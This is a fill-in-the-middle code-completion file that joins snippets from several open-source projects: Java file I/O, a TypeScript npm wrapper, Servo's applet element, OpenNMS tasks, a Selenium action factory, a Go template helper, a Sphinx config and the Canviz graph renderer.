private String readFile(String path) throws IOException {
StringBuilder contents = new StringBuilder();
BufferedReader br = new BufferedReader(new FileReader(path));
String line = null;
while ((line = br.readLine()) != null) {
contents.append(line);
contents.append(System.getProperty("line.separator"));
}
br.close();
return contents.toString();
}
// Writes a file from String
private void writeFile(String path, String contents) throws IOException {
BufferedWriter output = null;
output = new BufferedWriter(new FileWriter(new File(path)));
output.write(contents);
output.close();
}
}<|fim▁end|>
|
contents.add(btnEdit, "growx, center");
contents.add(btnDelete, "growx, center");
contents.add(sep, "growx, spanx 3");
contents.add(btnApply, "center, growx, spanx 3");
|
<|file_name|>node-package-manager.ts<|end_file_name|><|fim▁begin|>import Future = require("fibers/future");
import * as npm from "npm";
interface INpmOpts {
config?: any;
subCommandName?: string;
path?: string;<|fim▁hole|>export class NodePackageManager implements INodePackageManager {
constructor(private $childProcess: IChildProcess,
private $logger: ILogger,
private $options: IOptions) { }
public getCache(): string {
return npm.cache;
}
public load(config?: any): IFuture<void> {
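		// npm can only be load()-ed once per process, so on later calls just swap the CLI-level config values in place.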
if (npm.config.loaded) {
let data = npm.config.sources.cli.data;
Object.keys(data).forEach(k => delete data[k]);
if (config) {
_.assign(data, config);
}
return Future.fromResult();
} else {
let future = new Future<void>();
npm.load(config, (err: Error) => {
if (err) {
future.throw(err);
} else {
future.return();
}
});
return future;
}
}
public install(packageName: string, pathToSave: string, config?: any): IFuture<any> {
return (() => {
if (this.$options.disableNpmInstall) {
return;
}
if (this.$options.ignoreScripts) {
config = config || {};
config["ignore-scripts"] = true;
}
try {
return this.loadAndExecute("install", [pathToSave, packageName], { config: config }).wait();
} catch (err) {
if (err.code === "EPEERINVALID") {
				// Peer dependencies that are not installed are treated by npm 2 as errors, but npm 3 treats them as warnings.
				// We'll show them as warnings and let the user install them in case they are needed.
				// The structure of the error object in such a case is:
// { [Error: The package @angular/[email protected] does not satisfy its siblings' peerDependencies requirements!]
// code: 'EPEERINVALID',
// packageName: '@angular/core',
// packageVersion: '2.1.0-beta.0',
// peersDepending:
// { '@angular/[email protected]': '2.1.0-beta.0',
// '@angular/[email protected]': '2.1.0-beta.0',
// '@angular/[email protected]': '2.1.0-beta.0',
// '@angular/[email protected]': '2.1.0-beta.0',
// '@angular/[email protected]': '2.1.0-beta.0',
// '@angular/[email protected]': '2.1.0-beta.0',
// '@angular/[email protected]': '2.1.0-beta.0',
// '@angular/[email protected]': '2.1.0-beta.0',
// '@ngrx/[email protected]': '^2.0.0',
// '@ngrx/[email protected]': '^2.0.0',
// '[email protected]': '~2.0.0' } }
this.$logger.warn(err.message);
this.$logger.trace("Required peerDependencies are: ", err.peersDepending);
} else {
// All other errors should be handled by the caller code.
throw err;
}
}
}).future<any>()();
}
public uninstall(packageName: string, config?: any, path?: string): IFuture<any> {
return this.loadAndExecute("uninstall", [[packageName]], { config, path });
}
public search(filter: string[], silent: boolean): IFuture<any> {
let args = (<any[]>([filter] || [])).concat(silent);
return this.loadAndExecute("search", args);
}
public cache(packageName: string, version: string, config?: any): IFuture<IDependencyData> {
// function cache (pkg, ver, where, scrub, cb)
return this.loadAndExecute("cache", [packageName, version, undefined, false], { subCommandName: "add", config: config });
}
public cacheUnpack(packageName: string, version: string, unpackTarget?: string): IFuture<void> {
// function unpack (pkg, ver, unpackTarget, dMode, fMode, uid, gid, cb)
return this.loadAndExecute("cache", [packageName, version, unpackTarget, null, null, null, null], { subCommandName: "unpack" });
}
public view(packageName: string, propertyName: string): IFuture<any> {
return this.loadAndExecute("view", [[packageName, propertyName], [false]]);
}
public executeNpmCommand(npmCommandName: string, currentWorkingDirectory: string): IFuture<any> {
return this.$childProcess.exec(npmCommandName, { cwd: currentWorkingDirectory });
}
private loadAndExecute(commandName: string, args: any[], opts?: INpmOpts): IFuture<any> {
return (() => {
opts = opts || {};
this.load(opts.config).wait();
return this.executeCore(commandName, args, opts).wait();
}).future<any>()();
}
private executeCore(commandName: string, args: any[], opts?: INpmOpts): IFuture<any> {
let future = new Future<any>();
let oldNpmPath: string = undefined;
let callback = (err: Error, data: any) => {
if (oldNpmPath) {
npm.prefix = oldNpmPath;
}
if (err) {
future.throw(err);
} else {
future.return(data);
}
};
args.push(callback);
if (opts && opts.path) {
oldNpmPath = npm.prefix;
npm.prefix = opts.path;
}
let subCommandName: string = opts.subCommandName;
let command = subCommandName ? npm.commands[commandName][subCommandName] : npm.commands[commandName];
command.apply(this, args);
return future;
}
}
$injector.register("npm", NodePackageManager);<|fim▁end|>
|
}
|
<|file_name|>htmlappletelement.rs<|end_file_name|><|fim▁begin|>/* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at http://mozilla.org/MPL/2.0/. */
use dom::attr::AttrValue;
use dom::bindings::codegen::Bindings::HTMLAppletElementBinding;
use dom::bindings::codegen::Bindings::HTMLAppletElementBinding::HTMLAppletElementMethods;
use dom::bindings::inheritance::Castable;
use dom::bindings::js::Root;
use dom::document::Document;
use dom::htmlelement::HTMLElement;
use dom::node::Node;
use dom::virtualmethods::VirtualMethods;
use string_cache::Atom;
use util::str::DOMString;
#[dom_struct]
pub struct HTMLAppletElement {<|fim▁hole|>}
impl HTMLAppletElement {
fn new_inherited(localName: DOMString,
prefix: Option<DOMString>,
document: &Document) -> HTMLAppletElement {
HTMLAppletElement {
htmlelement:
HTMLElement::new_inherited(localName, prefix, document)
}
}
#[allow(unrooted_must_root)]
pub fn new(localName: DOMString,
prefix: Option<DOMString>,
document: &Document) -> Root<HTMLAppletElement> {
let element = HTMLAppletElement::new_inherited(localName, prefix, document);
Node::reflect_node(box element, document, HTMLAppletElementBinding::Wrap)
}
}
impl HTMLAppletElementMethods for HTMLAppletElement {
// https://html.spec.whatwg.org/multipage/#the-applet-element:dom-applet-name
make_getter!(Name);
// https://html.spec.whatwg.org/multipage/#the-applet-element:dom-applet-name
make_atomic_setter!(SetName, "name");
}
impl VirtualMethods for HTMLAppletElement {
fn super_type(&self) -> Option<&VirtualMethods> {
Some(self.upcast::<HTMLElement>() as &VirtualMethods)
}
fn parse_plain_attribute(&self, name: &Atom, value: DOMString) -> AttrValue {
match name {
&atom!("name") => AttrValue::from_atomic(value),
_ => self.super_type().unwrap().parse_plain_attribute(name, value),
}
}
}<|fim▁end|>
|
htmlelement: HTMLElement
|
<|file_name|>AsyncTask.java<|end_file_name|><|fim▁begin|>/*******************************************************************************
* This file is part of OpenNMS(R).
*
* Copyright (C) 2007-2014 The OpenNMS Group, Inc.
* OpenNMS(R) is Copyright (C) 1999-2014 The OpenNMS Group, Inc.
*
* OpenNMS(R) is a registered trademark of The OpenNMS Group, Inc.
*
* OpenNMS(R) is free software: you can redistribute it and/or modify
* it under the terms of the GNU Affero General Public License as published
* by the Free Software Foundation, either version 3 of the License,
* or (at your option) any later version.
*
* OpenNMS(R) is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU Affero General Public License for more details.
*
* You should have received a copy of the GNU Affero General Public License
* along with OpenNMS(R). If not, see:
* http://www.gnu.org/licenses/
*
* For more information contact:
* OpenNMS(R) Licensing <[email protected]>
* http://www.opennms.org/
* http://www.opennms.com/
*******************************************************************************/
package org.opennms.core.tasks;
import org.springframework.util.Assert;
/**
* <p>AsyncTask class.</p>
*
* @author ranger
* @version $Id: $
*/
public class AsyncTask<T> extends AbstractTask {
private final Async<T> m_async;
private final Callback<T> m_callback;
/**
* <p>Constructor for AsyncTask.</p>
*
* @param coordinator a {@link org.opennms.core.tasks.TaskCoordinator} object.
* @param parent a {@link org.opennms.core.tasks.ContainerTask} object.
* @param async a {@link org.opennms.core.tasks.Async} object.
* @param <T> a T object.
*/
public AsyncTask(TaskCoordinator coordinator, ContainerTask<?> parent, Async<T> async) {
this(coordinator, parent, async, null);<|fim▁hole|>
/**
* <p>Constructor for AsyncTask.</p>
*
* @param coordinator a {@link org.opennms.core.tasks.TaskCoordinator} object.
* @param parent a {@link org.opennms.core.tasks.ContainerTask} object.
* @param async a {@link org.opennms.core.tasks.Async} object.
* @param callback a {@link org.opennms.core.tasks.Callback} object.
*/
public AsyncTask(TaskCoordinator coordinator, ContainerTask<?> parent, Async<T> async, Callback<T> callback) {
super(coordinator, parent);
Assert.notNull(async, "async parameter must not be null");
m_async = async;
m_callback = callback;
}
/** {@inheritDoc} */
@Override
public String toString() {
return String.valueOf(m_async);
}
/** {@inheritDoc} */
@Override
protected void doSubmit() {
Callback<T> callback = callback();
try {
m_async.supplyAsyncThenAccept(callback);
} catch (Throwable t) {
callback.handleException(t);
}
}
/**
* <p>markTaskAsCompleted</p>
*/
private final void markTaskAsCompleted() {
getCoordinator().markTaskAsCompleted(this);
}
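    // Wraps the user-supplied callback so the coordinator is notified of completion on both
    // the success and the failure path.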
private Callback<T> callback() {
return new Callback<T>() {
@Override
public void accept(T t) {
try {
if (m_callback != null) {
m_callback.accept(t);
}
} finally {
markTaskAsCompleted();
}
}
@Override
public T apply(Throwable t) {
try {
if (m_callback != null) {
m_callback.handleException(t);
}
} finally {
markTaskAsCompleted();
}
return null;
}
};
}
}<|fim▁end|>
|
}
|
<|file_name|>ActionFactory.java<|end_file_name|><|fim▁begin|>package beseenium.controller.ActionFactory;
/** Copyright(C) 2015 Jan P.C. Hanson & BeSeen Marketing Ltd
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
import java.net.MalformedURLException;
import java.util.HashMap;
import java.util.Map;
import beseenium.controller.ActionDataFactory.ActionDataFactory;<|fim▁hole|>import beseenium.controller.ActionFactory.elementActions.MakeGetCssValue;
import beseenium.controller.ActionFactory.elementActions.MakeGetLocation;
import beseenium.controller.ActionFactory.elementActions.MakeGetSize;
import beseenium.controller.ActionFactory.elementActions.MakeGetTagName;
import beseenium.controller.ActionFactory.elementActions.MakeGetText;
import beseenium.controller.ActionFactory.elementActions.MakeIsDisplayed;
import beseenium.controller.ActionFactory.elementActions.MakeIsEnabled;
import beseenium.controller.ActionFactory.elementActions.MakeIsSelected;
import beseenium.controller.ActionFactory.elementActions.MakeSendKeys;
import beseenium.controller.ActionFactory.elementActions.MakeSubmit;
import beseenium.controller.ActionFactory.findElementsBy.MakeFindElementsByClass;
import beseenium.controller.ActionFactory.findElementsBy.MakeFindElementsByCss;
import beseenium.controller.ActionFactory.findElementsBy.MakeFindElementsById;
import beseenium.controller.ActionFactory.findElementsBy.MakeFindElementsByLinkTxt;
import beseenium.controller.ActionFactory.findElementsBy.MakeFindElementsByName;
import beseenium.controller.ActionFactory.findElementsBy.MakeFindElementsByPartialLinkTxt;
import beseenium.controller.ActionFactory.findElementsBy.MakeFindElementsByTagName;
import beseenium.controller.ActionFactory.findElementsBy.MakeFindElementsByXpath;
import beseenium.controller.ActionFactory.navigateActions.MakeNavigateBack;
import beseenium.controller.ActionFactory.navigateActions.MakeNavigateForward;
import beseenium.controller.ActionFactory.navigateActions.MakeRefreshPage;
import beseenium.controller.ActionFactory.pageActions.MakeBrowserQuit;
import beseenium.controller.ActionFactory.pageActions.MakeGetPageSrc;
import beseenium.controller.ActionFactory.pageActions.MakeGetTitle;
import beseenium.controller.ActionFactory.pageActions.MakeGetURL;
import beseenium.controller.ActionFactory.pageActions.MakePageClose;
import beseenium.controller.ActionFactory.pageActions.MakePageGet;
import beseenium.exceptions.actionDataExceptions.ActionDataFactoryException;
import beseenium.exceptions.actionExceptions.ActionFactoryException;
import beseenium.model.action.AbstractAction;
/**
* this class is a factory for creating actions, it uses a factory method
* style pattern and a map implementation.
* @author JPC Hanson
*
*/
public class ActionFactory
{
/** the map to store the actions in **/
private Map<String, MakeAction> actionMap;
/** internal ActionDataFactory reference **/
private ActionDataFactory actionDataFactory;
/**
* default constructor creates and populates internal map
* @param actionDataFactory
* @throws ActionDataFactoryException
* @throws MalformedURLException
*
*/
public ActionFactory(ActionDataFactory actionDataFactory)
throws ActionDataFactoryException, MalformedURLException
{
super();
this.actionDataFactory = actionDataFactory;
this.actionMap = new HashMap<String, MakeAction>();
this.populateActionMap();
}
/**
* creates an Action
* @return AbstractAction
* @throws ActionFactoryException
* @throws ActionDataFactoryException
*/
public AbstractAction makeAction(String actionKey) throws ActionFactoryException
{
if(this.actionMap.containsKey(actionKey))
{return this.actionMap.get(actionKey).makeAction();}
else
		{throw new ActionFactoryException("you cannot instantiate this type of Action '"
				+ actionKey + "'. Check your spelling, or refer to the documentation");}
}
/**
* creates all possible actions and populates the map with them.
* @throws ActionDataFactoryException
*
*/
private void populateActionMap() throws ActionDataFactoryException
{
// //Page Actions
this.actionMap.put( "PageGet", new MakePageGet(actionDataFactory));
this.actionMap.put( "GetPageSrc", new MakeGetPageSrc(actionDataFactory));
this.actionMap.put( "BrowserQuit", new MakeBrowserQuit(actionDataFactory));
this.actionMap.put( "GetTitle", new MakeGetTitle(actionDataFactory));
this.actionMap.put( "GetURL", new MakeGetURL(actionDataFactory));
this.actionMap.put( "PageClose", new MakePageClose(actionDataFactory));
// //Navigation Actions
this.actionMap.put( "NavigateBack", new MakeNavigateBack(actionDataFactory));
this.actionMap.put( "NavigateForward", new MakeNavigateForward(actionDataFactory));
this.actionMap.put( "RefreshPage", new MakeRefreshPage(actionDataFactory));
// //Find Element Actions
this.actionMap.put( "FindElementsByClass", new MakeFindElementsByClass(actionDataFactory));
this.actionMap.put( "FindElementsByCss", new MakeFindElementsByCss(actionDataFactory));
this.actionMap.put( "FindElementsById", new MakeFindElementsById(actionDataFactory));
this.actionMap.put( "FindElementsByLinkTxt", new MakeFindElementsByLinkTxt(actionDataFactory));
this.actionMap.put( "FindElementsByName", new MakeFindElementsByName(actionDataFactory));
this.actionMap.put( "FindElementsByPartialLinkTxt", new MakeFindElementsByPartialLinkTxt(actionDataFactory));
this.actionMap.put( "FindElementsByTagName", new MakeFindElementsByTagName(actionDataFactory));
this.actionMap.put( "FindElementsByXpath", new MakeFindElementsByXpath(actionDataFactory));
// //Element Actions
this.actionMap.put( "Clear", new MakeClear(actionDataFactory));
this.actionMap.put( "Click", new MakeClick(actionDataFactory));
this.actionMap.put( "GetAttribute", new MakeGetAttribute(actionDataFactory));
this.actionMap.put( "GetCssValue", new MakeGetCssValue(actionDataFactory));
this.actionMap.put( "GetLocation", new MakeGetLocation(actionDataFactory));
this.actionMap.put( "GetSize", new MakeGetSize(actionDataFactory));
this.actionMap.put( "GetTagName", new MakeGetTagName(actionDataFactory));
this.actionMap.put( "GetText", new MakeGetText(actionDataFactory));
this.actionMap.put( "IsDisplayed", new MakeIsDisplayed(actionDataFactory));
this.actionMap.put( "IsEnabled", new MakeIsEnabled(actionDataFactory));
this.actionMap.put( "IsSelected", new MakeIsSelected(actionDataFactory));
this.actionMap.put( "SendKeys", new MakeSendKeys(actionDataFactory));
this.actionMap.put( "Submit", new MakeSubmit(actionDataFactory));
}
}<|fim▁end|>
|
import beseenium.controller.ActionFactory.elementActions.MakeClear;
import beseenium.controller.ActionFactory.elementActions.MakeClick;
import beseenium.controller.ActionFactory.elementActions.MakeGetAttribute;
|
<|file_name|>configrb.go<|end_file_name|><|fim▁begin|>package libclc
import (
"text/template"
"bufio"
)
<|fim▁hole|> return WriteTemplate("crb", config, t, path)
}
func BufferConfigrb(config *Configrb, t *template.Template, w *bufio.Writer) (error) {
return BufferTemplate("crb", config, t, w)
}<|fim▁end|>
|
type Configrb struct {
}
func WriteConfigrb(config *Configrb, t *template.Template, path string) (error) {
|
<|file_name|>conf.py<|end_file_name|><|fim▁begin|>import os
import runpy
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.intersphinx',
'sphinx.ext.pngmath',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'pyHMSA'
copyright = u'2014, Philippe Pinard'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
filepath = os.path.join(os.path.dirname(__file__),
'..', '..', 'pyhmsa', '__init__.py')
_vars = runpy.run_path(filepath)
version = _vars['__version__']
# The full version, including alpha/beta/rc tags.
release = version
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'solar'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = ['_themes']
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
html_title = 'pyHMSA documentation'
# A shorter title for the navigation bar. Default is the same as html_title.
html_short_title = 'pyHMSA'
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
html_show_sourcelink = False
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'pyHMSAdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'pyHMSA.tex', u'pyHMSA Documentation',
u'Philippe Pinard', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'pyhmsa', u'pyHMSA Documentation',
[u'Philippe Pinard'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'pyHMSA', u'pyHMSA Documentation',
u'Philippe Pinard', 'pyHMSA', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
# -- Options for Epub output ----------------------------------------------
# Bibliographic Dublin Core info.
epub_title = u'pyHMSA'
epub_author = u'Philippe Pinard'
epub_publisher = u'Philippe Pinard'
epub_copyright = u'2014, Philippe Pinard'
# The basename for the epub file. It defaults to the project name.
#epub_basename = u'pyHMSA'
# The HTML theme for the epub output. Since the default themes are not optimized
# for small screen space, using the same theme for HTML and epub output is
# usually not wise. This defaults to 'epub', a theme designed to save visual
# space.
#epub_theme = 'epub'
# The language of the text. It defaults to the language option
# or en if the language is not set.
#epub_language = ''
# The scheme of the identifier. Typical schemes are ISBN or URL.
#epub_scheme = ''
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#epub_identifier = ''
# A unique identification for the text.
#epub_uid = ''<|fim▁hole|>
# A tuple containing the cover image and cover page html template filenames.
#epub_cover = ()
# A sequence of (type, uri, title) tuples for the guide element of content.opf.
#epub_guide = ()
# HTML files that should be inserted before the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_pre_files = []
# HTML files that should be inserted after the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_post_files = []
# A list of files that should not be packed into the epub file.
#epub_exclude_files = []
# The depth of the table of contents in toc.ncx.
#epub_tocdepth = 3
# Allow duplicate toc entries.
#epub_tocdup = True
# Choose between 'default' and 'includehidden'.
#epub_tocscope = 'default'
# Fix unsupported image types using the PIL.
#epub_fix_images = False
# Scale large images.
#epub_max_image_width = 0
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#epub_show_urls = 'inline'
# If false, no index is generated.
#epub_use_index = True
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'http://docs.python.org/': None}
autoclass_content = "both"
#autodoc_member_order = "bysource"
autodoc_default_flags = ['undoc-members']<|fim▁end|>
| |
<|file_name|>Entity.js<|end_file_name|><|fim▁begin|>//#include 'debug.js'
//#include 'Image.js'
//#include 'path/Ellipse.js'
//#include 'path/Path.js'
//#include 'path/Point.js'
//#include 'path/Rect.js'
//#include 'Tokenizer.js'
var CanvizEntity = exports.CanvizEntity = function(defaultAttrHashName, name, canviz, rootGraph, parentGraph, immediateGraph) {
this.defaultAttrHashName = defaultAttrHashName;
this.name = name;
this.canviz = canviz;
this.rootGraph = rootGraph;
this.parentGraph = parentGraph;
this.immediateGraph = immediateGraph;
this.attrs = {};
this.drawAttrs = {};
};
CanvizEntity.prototype = {
initBB: function() {
var matches = this.getAttr('pos').match(/([0-9.]+),([0-9.]+)/);
var x = Math.round(matches[1]);
var y = Math.round(this.canviz.height - matches[2]);
this.bbRect = new Rect(x, y, x, y);
},
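  // Looks up an attribute on this entity, falling back through the parent graphs'
  // default attribute hashes; optionally expands the \N, \E, \T, \H, \G and \L escapes.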
getAttr: function(attrName, escString) {
if ('undefined' === typeof escString) escString = false;
var attrValue = this.attrs[attrName];
if ('undefined' === typeof attrValue) {
var graph = this.parentGraph;
while ('undefined' !== typeof graph) {
attrValue = graph[this.defaultAttrHashName][attrName];
if ('undefined' === typeof attrValue) {
graph = graph.parentGraph;
} else {
break;
}
}
}
if (attrValue && escString) {
attrValue = attrValue.replace(this.escStringMatchRe, _.bind(function(match, p1) {
switch (p1) {
case 'N': // fall through
case 'E': return this.name;
case 'T': return this.tailNode;
case 'H': return this.headNode;
case 'G': return this.immediateGraph.name;
case 'L': return this.getAttr('label', true);
}
return match;
}, this));
}
return attrValue;
},
draw: function(ctx, ctxScale, redrawCanvasOnly) {
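    // Walks the entity's xdot draw-attribute strings token by token, handling ellipses,
    // polygons/polylines, b-splines, images, text, and colour/font/style changes.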
var i, tokens, fillColor, strokeColor;
if (!redrawCanvasOnly) {
this.initBB();
var bbDiv = $('<div>');
bbDiv.addClass('entity');
this.canviz.elements.append(bbDiv);
var tooltip = this.getAttr('tooltip');
if (tooltip)
bbDiv.attr({title: tooltip});
}
_.each(this.drawAttrs, _.bind(function(command) {
// debug(command);
var tokenizer = new CanvizTokenizer(command);
var token = tokenizer.takeChars();
if (token) {
var dashStyle = 'solid';
ctx.save();
while (token) {
// debug('processing token ' + token);
switch (token) {
case 'E': // filled ellipse
case 'e': // unfilled ellipse
var filled = ('E' == token);
var cx = tokenizer.takeNumber();
var cy = this.canviz.height - tokenizer.takeNumber();
var rx = tokenizer.takeNumber();
var ry = tokenizer.takeNumber();
var path = new Ellipse(cx, cy, rx, ry);
break;
case 'P': // filled polygon
case 'p': // unfilled polygon
case 'L': // polyline
var filled = ('P' == token);
var closed = ('L' != token);
var numPoints = tokenizer.takeNumber();
tokens = tokenizer.takeNumber(2 * numPoints); // points
var path = new Path();
for (i = 2; i < 2 * numPoints; i += 2) {
path.addBezier([
new Point(tokens[i - 2], this.canviz.height - tokens[i - 1]),
new Point(tokens[i], this.canviz.height - tokens[i + 1])
]);
}
if (closed) {
path.addBezier([
new Point(tokens[2 * numPoints - 2], this.canviz.height - tokens[2 * numPoints - 1]),
new Point(tokens[0], this.canviz.height - tokens[1])
]);
}
break;
case 'B': // unfilled b-spline
case 'b': // filled b-spline
var filled = ('b' == token);
var numPoints = tokenizer.takeNumber();
tokens = tokenizer.takeNumber(2 * numPoints); // points
var path = new Path();
for (i = 2; i < 2 * numPoints; i += 6) {
path.addBezier([
new Point(tokens[i - 2], this.canviz.height - tokens[i - 1]),
new Point(tokens[i], this.canviz.height - tokens[i + 1]),
new Point(tokens[i + 2], this.canviz.height - tokens[i + 3]),
new Point(tokens[i + 4], this.canviz.height - tokens[i + 5])
]);
}
break;
case 'I': // image
var l = tokenizer.takeNumber();
var b = this.canviz.height - tokenizer.takeNumber();
var w = tokenizer.takeNumber();
var h = tokenizer.takeNumber();
var src = tokenizer.takeString();
if (!this.canviz.images[src]) {
this.canviz.images[src] = new CanvizImage(this.canviz, src);
}
this.canviz.images[src].draw(ctx, l, b - h, w, h);
break;
case 'T': // text
var l = Math.round(ctxScale * tokenizer.takeNumber() + this.canviz.padding);
var t = Math.round(ctxScale * this.canviz.height + 2 * this.canviz.padding - (ctxScale * (tokenizer.takeNumber() + this.canviz.bbScale * fontSize) + this.canviz.padding));
var textAlign = tokenizer.takeNumber();
var textWidth = Math.round(ctxScale * tokenizer.takeNumber());
var str = tokenizer.takeString();
if (!redrawCanvasOnly && !/^\s*$/.test(str)) {
// debug('draw text ' + str + ' ' + l + ' ' + t + ' ' + textAlign + ' ' + textWidth);
str = _.str.escapeHTML(str);
do {
matches = str.match(/ ( +)/);
if (matches) {
                  var spaces = '\u00a0'; // use non-breaking spaces so runs of whitespace survive in HTML
                  _(matches[1].length).times(function() {
                    spaces += '\u00a0';
                  });
str = str.replace(/ +/, spaces);
}
} while (matches);
var text;
var href = this.getAttr('URL', true) || this.getAttr('href', true);
if (href) {
var target = this.getAttr('target', true) || '_self';
var tooltip = this.getAttr('tooltip', true) || this.getAttr('label', true);
// debug(this.name + ', href ' + href + ', target ' + target + ', tooltip ' + tooltip);
              text = $('<a>').attr({href: href, target: target, title: tooltip});
_.each(['onclick', 'onmousedown', 'onmouseup', 'onmouseover', 'onmousemove', 'onmouseout'], _.bind(function(attrName) {
var attrValue = this.getAttr(attrName, true);
if (attrValue) {
                  text.attr(attrName, attrValue);
}
}, this));
text.css({
textDecoration: 'none'
});
} else {
text = $('<span>');
}
text.html(str);
text.css({
fontSize: Math.round(fontSize * ctxScale * this.canviz.bbScale) + 'px',
fontFamily: fontFamily,
color: strokeColor.textColor,
position: 'absolute',
textAlign: (-1 == textAlign) ? 'left' : (1 == textAlign) ? 'right' : 'center',
left: (l - (1 + textAlign) * textWidth) + 'px',
top: t + 'px',
width: (2 * textWidth) + 'px'
});
if (1 !== strokeColor.opacity)
              text.css({opacity: strokeColor.opacity});
$(this.canviz.elements).append(text);
}<|fim▁hole|> var color = this.parseColor(tokenizer.takeString());
if (fill) {
fillColor = color;
ctx.fillStyle = color.canvasColor;
} else {
strokeColor = color;
ctx.strokeStyle = color.canvasColor;
}
break;
case 'F': // set font
fontSize = tokenizer.takeNumber();
fontFamily = tokenizer.takeString();
switch (fontFamily) {
case 'Times-Roman':
fontFamily = 'Times New Roman';
break;
case 'Courier':
